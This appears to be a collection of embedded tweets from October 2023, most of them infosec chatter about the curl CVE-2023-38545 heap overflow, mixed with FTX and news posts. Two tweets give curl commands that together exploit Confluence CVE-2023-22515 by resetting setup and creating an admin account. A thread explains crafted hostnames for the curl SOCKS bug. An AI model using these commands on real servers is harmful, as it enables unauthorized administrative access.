starting to think some of these courtroom sketch artists lost money on FTX pic.twitter.com/36hzJkzaqa

— Molly White (@molly0xFFF) October 11, 2023

here I was hoping for the cURL bug to be something useful to upgrade a SSRF to have new superpowers or something similar. 🙃

good luck exploiting this heap overflow on a modern-ish libc in a remote context with valid hostname characters for the trigger

— blasty (@bl4sty) October 11, 2023

Textbook deception. “In calls, Hamas operatives, who talked to each other when tapped by Israeli intelligence agents, also gave the sense that they sought to avoid another war with Israel so soon after a damaging two-week conflict in May 2021” https://t.co/CsvpkEblQd

— Shashank Joshi (@shashj) October 11, 2023

1/ Just caught up with a few investor friends in the consumer space last week about Ozempic and GLP1s

As far as I can tell, everything basically hinges on: how much does it matter that every consumer product in the world depends on a tiny cohort of super consumers?

— Corry Wang (@corry_wang) October 11, 2023

Imagine going on a date with someone holding a fish in their dating profile picture and when you get to the restaurant it’s just a salmon sitting there waiting

— Missy Martinez (@MissyXMartinez) August 11, 2023

Guide to setting up a hardware hacking lab for noobs by @wrongbaudhttps://t.co/IqO6XJYW4A

— Dreg (@therealdreg) October 10, 2023

"On finding a too long host name. the curl code makes the bad decision to instead switch over to local resolve mode"
👀 curl with TOR de-anonymization potential (e.g., HTTP redirect to long host name)? https://t.co/W18pYGNkPt

— Juliano Rizzo (@julianor) October 11, 2023

CISA issues warning that people are still using Adobe Acrobat Reader! https://t.co/YWjdML4VkJ

— thaddeus e. grugq thegrugq@infosec.exchange (@thegrugq) October 11, 2023

We kinda feared this might be coming https://t.co/g2G9gpKsIX

— Niao Collective (@NiaoCollective) October 11, 2023

Whomst Up Hollabacking They Curls? pic.twitter.com/jam0yl4asx

— @netspooky@haunted.computer (@netspooky) October 11, 2023

PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action
(login with adm1n/adm1n)

— Nicolas Krassas (@Dinosn) October 11, 2023

This is not a standalone PoC for this vuln at all. It won't work unless you first flip the setupComplete bool to false via a request like:
curl -vk http://<ip>:<port>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Source: https://t.co/FvTITdWFC0

— Erik Wynter (@Wynter@infosec.exchange) (@WynterErik) October 11, 2023

curl CVE-2023-38545 can be used to partially control the SOCKS conversation. Given a hostname of:

h + PP + padding

Where h is a hostname, PP is a network order short representing a port, and the total length mod 256 is the length of h, this will result in a connection to h:PP

— xchg justin,justin (@justinsteven) October 12, 2023

Due to an overflow in the one-byte hostname length field, the client will resolve h and connect to its PP via the proxy. It will send the padding followed by the usual request.

h, PP and padding must be DNS-safe bytes

This could have SSRF or privacy impact perhaps? ¯\_(ツ)_/¯

— xchg justin,justin (@justinsteven) October 12, 2023

Note that the second picture is a listener running on the SOCKS proxy itself, as in this case h == "localhost", which will be taken from the perspective of my SOCKS proxy and for which my proxy allows clients to connect to pic.twitter.com/K5vljZvSbq

— xchg justin,justin (@justinsteven) October 12, 2023

I was wondering that. The SOCKS proxy remains responsible for the resolution and connection, so if the proxy is Tor and it’s well behaved there shouldn’t be an impact? I don’t know enough about Tor deanonymisation though. It’s definitely worth considering.

— xchg justin,justin (@justinsteven) October 12, 2023

Will be soon releasing a tool that will allow you to play with macOS libmalloc allocators. So you can, um, find strange patterns. pic.twitter.com/E1EMrH1t5e

— Josh Pitts (@ausernamedjosh) October 11, 2023

My presentation video in BlackHat Asia 2023. Hope you like it!😄❤️@BlackHatEvents https://t.co/6MoD7H7Dne

— pyn3rd (@pyn3rd) October 9, 2023

⚗️ nord-stream

Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.https://t.co/dNIM9JMqs1

— Marco Lancini (@lancinimarco) October 11, 2023

New: European standards body that created secret TETRA encryption algorithms used in police/military radios is talking about making new algorithms public, following intense backlash after researchers found severe security flaws in its old secret algorithms https://t.co/YbgJKuLRS5

— Kim Zetter (@KimZetter) October 11, 2023

Caroline Ellison of FTX admits that Sam bribed Chinese officials with $100M to unfreeze their assets, purposely tried to scam Saudi investors in the final days of FTX, intentionally tried to sic regulators on Binance to destroy his competition, and it's only lunchtime.

— Autism Capital 🧩 (@AutismCapital) October 11, 2023